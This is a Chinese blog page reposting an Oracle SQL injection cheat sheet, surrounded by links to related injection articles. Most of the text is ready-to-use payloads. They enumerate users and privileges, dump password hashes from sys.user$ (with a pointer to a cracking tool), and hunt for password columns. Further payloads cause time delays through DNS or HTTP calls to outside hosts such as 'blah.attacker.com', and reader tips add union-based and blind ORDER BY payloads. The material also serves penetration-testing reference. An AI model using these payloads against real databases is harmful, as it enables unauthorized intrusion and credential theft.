oracle 注入手册

最新推荐文章于 2022-03-01 17:25:20 发布
最新推荐文章于 2022-03-01 17:25:20 发布
阅读量531 收藏 1
点赞数
分类专栏: sqlmap
版本: SELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’;
SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’;
SELECT version FROM v$instance;
注释: SELECT 1 FROM dual — comment
– NB: SELECT statements must have a FROM clause in Oracle so we have to use the dummy table name ‘dual’ when we’re not actually selecting from a table.
当前用户: SELECT user FROM dual
用户列表: SELECT username FROM all_users ORDER BY username;
SELECT name FROM sys.user$; — priv
用户哈希列表: SELECT name, password, astatus FROM sys.user$ — priv, <= 10g.  astatus tells you if acct is locked
SELECT name,spare4 FROM sys.user$ — priv, 11g
 密码破解: checkpwd will crack the DES-based hashes from Oracle 8, 9 and 10.
权限列表: SELECT * FROM session_privs; — current privs
SELECT * FROM dba_sys_privs WHERE grantee = ‘DBSNMP’; — priv, list a user’s privs
SELECT grantee FROM dba_sys_privs WHERE privilege = ‘SELECT ANY DICTIONARY’; — priv, find users with a particular priv
SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;
DBA账号列表: SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = ‘YES’; — priv, list DBAs, DBA roles
当前数据库 SELECT global_name FROM global_name;
SELECT name FROM v$database;
SELECT instance_name FROM v$instance;
SELECT SYS.DATABASE_NAME FROM DUAL;
数据库列表: SELECT DISTINCT owner FROM all_tables; — list schemas (one per user)
– Also query TNS listener for other databases.  See tnscmd (services | status).
列列表: SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’;
SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and owner = ‘foo’;
表列表: SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;
查询表by column SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE ‘%PASS%’; — NB: table names are upper case
Select Nth Row SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; — gets 9th row (rows numbered from 1)
Select Nth Char SELECT substr(‘abcd’, 3, 1) FROM dual; — gets 3rd character, ‘c’
Bitwise AND SELECT bitand(6,2) FROM dual; — returns 2
SELECT bitand(6,1) FROM dual; — returns0
ASCII Value -> Char SELECT chr(65) FROM dual; — returns A
Char -> ASCII Value SELECT ascii(‘A’) FROM dual; — returns 65
Casting SELECT CAST(1 AS char) FROM dual;
SELECT CAST(’1′ AS int) FROM dual;
String Concatenation SELECT ‘A’ || ‘B’ FROM dual; — returns AB
If Statement BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; — doesn’t play well with SELECT statements
Case Statement SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; — returns 1
SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; — returns 2
避免引用 SELECT chr(65) || chr(66) FROM dual; — returns AB
时间延迟 BEGIN DBMS_LOCK.SLEEP(5); END; — priv, can’t seem to embed this in a SELECT
SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual; — if reverse looks are slow
SELECT UTL_INADDR.get_host_address(‘blah.attacker.com’) FROM dual; — if forward lookups are slow
SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual; — if outbound TCP is filtered / slow
– Also see Heavy Queries to create a time delay
Make DNS Requests SELECT UTL_INADDR.get_host_address(‘google.com’) FROM dual;
SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual;
Command Execution Javacan be used to execute commands if it’s installed.ExtProc can sometimes be used too, though it normally failed for me. :-(
Local File Access UTL_FILE can sometimes be used.  Check that the following is non-null:
SELECT value FROM v$parameter2 WHERE name = ‘utl_file_dir’;Java can be used to read and write files if it’s installed (it is not available in Oracle Express).

主机名,

IP

 SELECT UTL_INADDR.get_host_name FROM dual;
SELECT host_name FROM v$instance;
SELECT UTL_INADDR.get_host_address FROM dual; — gets IP address
SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual; — gets hostnames
数据库文件目录: SELECT name FROM V$DATAFILE;
Default/System Databases SYSTEM
SYSAUX

Misc Tips

In no particular order, here are some suggestions from pentestmonkey readers.

From Christian Mehlmauer:

Get all tablenames in one string select rtrim(xmlagg(xmlelement(e, table_name || ‘,’)).extract(‘//text()’).extract(‘//text()’) ,’,') from all_tables –  when using union based SQLI with only one row
Blind SQLI in order by clause order by case when ((select 1 from user_tables where substr(lower(table_name), 1, 1) = ‘a’ and rownum = 1)=1) then column_name1 else column_name2 end — you must know 2 column names with the same datatype
ask_man
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
oracle报错注入
笔墨稠思
11-25 2222
Oracle报错注入原理 通过ctxsys.drithsx.sn(user,查询语句)函数来根据页面报错获取我们需要的内容 注意事项: 1.oracle数据库在查询时,必须写表名,如果表不存在可以使用虚表 dual 2.Oracle数据库的字段数据类型是强匹配,必须保持数据类型相同 3.Oracle系统表 all_tables、user_tables、all_tab_columns、user_tab_columns 4.oracle限制查询结果返回的数量用rownum 靶场:http://59.63.2
MySQL update 中 select clause 的一个问题
「理」尚往来
01-06 327
  今天遇到的问题,随口说一句。   MySQL 中,如果 update 语句中含有 select 子句,那么update 的表和 select 子句中的表不能是一个。否则会得到“You can't specify target table ‘&lt;Table Name&gt;’ for update in FROM clause” 的错误消息。解决方法是在 select 子句的...
java 获取mysql路径_如何使用JPQL收集MySQL基本路径?
weixin_39889544的博客
03-05 86
我试图在windows-7上创建一个简单的Java应用程序,可以从mysql进行数据库备份 . 我需要mysql基本路径 . 我尝试使用JPQLEntityManagerFactory emf = Persistence.createEntityManagerFactory("BackupRestoreMysqlDatabasePU");EntityManager em = emf.createE...
oracle注入技术手册(Hacking_Oracle_From_Web)
10-12
该文档介绍了oracle显错、不显错情况下的注入,并介绍通过注入执行系统命令,同时介绍多种提权的0day 注意是英文版的
Oracle数据库手工注入
只为成最好的自己
09-27 5418
一、出现注入点的原因:程序员在编写代码时没有对用户输入的字符进行特殊处理。导致用户输入的特殊字符附带在参数中直接与数据库进行交互。 二、注入过程 1、打开一个连接地址:在网址后面加and 1=1 正常,and 1=2 错误。说明存在注入漏洞、 2、判断一下数据库中的表 and (select count(*) from admin) 3、判断一下该网站有几个管理员。 and
Oracle数据库SQL注入手册1
最新发布
08-08
This post is part of a series of SQL Injection Cheat Sheets.  In this series, I’
oracle数据库开发手册
05-11
手册会详细阐述Oracle的权限模型、审计功能以及如何防止SQL注入等攻击。理解并正确实施这些安全措施,可以保护数据库免受未授权访问和潜在威胁。 另外,手册可能还会包含故障排除、日志管理、网络配置等运维相关的...
oracle傻瓜手册
07-20
"Oracle傻瓜手册"可能是为了帮助初学者或不熟悉Oracle系统的用户快速理解和掌握Oracle在Linux环境下的操作技巧而编写的指南。以下是根据标题和描述可能包含的一些关键知识点: 1. **Oracle安装**:在Linux系统上...
Oracle DBA使用手册设计篇
05-19
Oracle DBA使用手册设计篇》是一本专为Oracle数据库管理员(DBA)精心编写的指南,涵盖了在设计和管理Oracle数据库过程中所涉及的关键概念、工具和技术。Oracle数据库是全球广泛应用的关系型数据库管理系统,尤其...
mysql #1349 - View's SELECT contains a subquery in the FROM clause 错误
kangojian的专栏
08-20 1万+
mysql 运行 语句drop view if exists   xiangqing;create view  xiangqing(UserName,TrueName,MemberIDPrizeFee,AgentID,Mobile) as select v.UserName,v.TrueName ,v.MemberID,v.PrizeFee,v.AgentID,v.Mobile from(se
Select From (Select from) as Alias
SuperBadBoy Test Road
03-22 1377
Sometimes we will get a column which contains a series of calculation such as ‘+‘or’-‘or’*‘or’/‘, meanwhile, we need use this result to do some other calculations as a result to be a final column For
【25】WEB安全学习----Oracle注入-1
尚未佩妥剑 转眼便江湖
09-23 457
一、Oracle基本知识 组成部分 Oracle数据库系统由数据库文件(保存在磁盘上的文件)、数据库实例(管理数据库文件的一组进程和内存结构)。 应用程序连接到数据库时,实际上是连接到一个Oracle实例,由Oracle实例中的进程和内存来为应用程序提供服务。 注意:在SQL server或MySQL中,当连接到数据库中可以同时管理多个数据库,这是因为实例就是数据库服务器引擎,,因此一个实...
oracle数据库注入实战,教你oracle注入
weixin_34005394的博客
04-12 836
大家都知道oracle比较大,11g的安装程序大约在1.4g左右,可能大家遇到oracle的库比较少,oracle+jsp的搭配的比较好... oracle系统库默认的用户有sys,system,internal,scott,前三个权限都是system权限.. 先说下数据库的注释:access支持null和%00注释; mssql支持--和;的注视;mysql支持/*的支持;oracle支持--的...
mysql 创建视图出现1349 View's SELECT contains a subquery in the FROM clause解决办法
simplecnpay的专栏
09-13 4万+
习惯用oracle创建视图,最近在
SQL注入手册
浅笑996的博客
09-17 282
英文版:链接: https://sqlwiki.netspi.com/ 中文版:链接: https://pan.baidu.com/s/1WWmjvYYnLC6_nItMVvUVig 密码: e98r qianxiao996欢迎您
Oracle注入(基础篇)
hackzkaq的博客
03-01 4337
零基础学黑客,搜索公众号:白帽子左一 先了解Oracle一些内容 Oracle做联合注入的注意事项(附带示例) 联合查询的字段数必须和前面的查询语句字段数一致 select id,username,password from admin union select 1,'admin' from dual (X) 联合查询的字段类型也必须和前面的查询语句字段类型一致 select id,username,password from admin union select 1,2,3 from dual (X)
mysql 创建视图时提示View's SELECT contains a subquery in the FROM clause
marks59848660的博客
07-08 2万+
今天要在MYSQL中创建一个视图,但是却失败了,提示View's SELECT contains a subquery in the FROM clause. 原因是mysql视图不支持子查询。那么只能把一个视图拆解成多个。 CREATE ALGORITHM=UNDEFINED SQL SECURITY DEFINER VIEW view_real AS SELECT c.scan_man A
Oracle SQL 注入
prahs的专栏
07-14 8838
Oracle SQL 注入本文主要总结在Oracle注入中的步骤方法和注意事项: 参考了:http://www.freebuf.com/articles/web/5411.html 注入常用语句 常用步骤 注意事项 常用步骤1 找注入点 用单引号’之类的触发报错 用or 1=1, or 1=2之类的观察反馈 2 判断数据库类型 oracle 支持– 类型注释,但是不支持;分隔执行多语句,orac
一些常见的SQL报错
热门推荐
u012120851的专栏
12-18 5万+
This section lists messages generated when SQL statements are parsed by the Oracle Server. Most, but not all, messages in this section indicate incorrect SQL syntax. For more information about SQL syn

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值